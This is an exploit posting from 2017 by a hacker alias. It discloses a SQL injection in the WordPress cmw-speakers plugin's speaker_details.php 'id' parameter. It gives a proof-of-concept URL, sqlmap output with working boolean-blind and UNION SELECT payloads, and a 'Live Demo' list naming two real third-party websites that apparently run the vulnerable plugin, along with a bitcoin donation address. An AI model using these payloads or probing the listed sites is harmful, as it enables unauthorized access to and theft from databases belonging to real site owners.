|----------------------------| | [xBADGIRL21] | | [N3W PUBLIC 3XPL0IT] | | _,________ | | 0day _T _==____() -- | | /##(_)-' | | /##/ | | x21 | |----------------------------| | Exploit Title : Wordpress cmw-speakers Plugin SQL injection Vulnerability | Exploit Author : xBADGIRL21 | Dork : N/A in PUBLISH VERSION | version : ALL | Tested on: [ WINDOWS] | MyBlog : http://xbadgirl21.blogspot.com/ | Date: 13/01/2017 | video Proof : https://youtu.be/Bqnf4Eyniqc | To buy or Danate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz |-------------------- | [+] Poc : | |-------------------- | [id] Get Parameter Vulnerable To SQLi | http://127.0.0.1/wp-content/plugins/cmw-speakers/speaker_details.php?id=[SQLi] |-------------------- | [+] SQLmap PoC: | |-------------------- | --- | Parameter: id (GET) | Type: boolean-based blind | Title: AND boolean-based blind - WHERE or HAVING clause | Payload: id=97 AND 8158=8158 | | Type: UNION query | Title: Generic UNION query (NULL) - 27 columns | Payload: id=-9178 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N | ULL,NULL,NULL,CONCAT(0x716a786b71,0x6d5342665a52696145434b4c694e546e61445972684f | 415a415845655a7a6f647658667459454b77,0x7171627a71),NULL,NULL,NULL,NULL,NULL,NULL |,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Srfj | --- | [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable | GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N |-------------------- | [!] Live Demo : | |-------------------- |1) http://cmw.net/radio/wp-content/plugins/cmw-speakers/speaker_details.php?id=9 |2) http://digitalmediasummit.ca/wp-content/plugins/cmw-speakers/speaker_details.php?id=375 |----------------------------------------------- | Discovered by : xBADGIRL21 | | Greetz : All Mauritanien Hackers - NoWhere | +----------------------------------------------+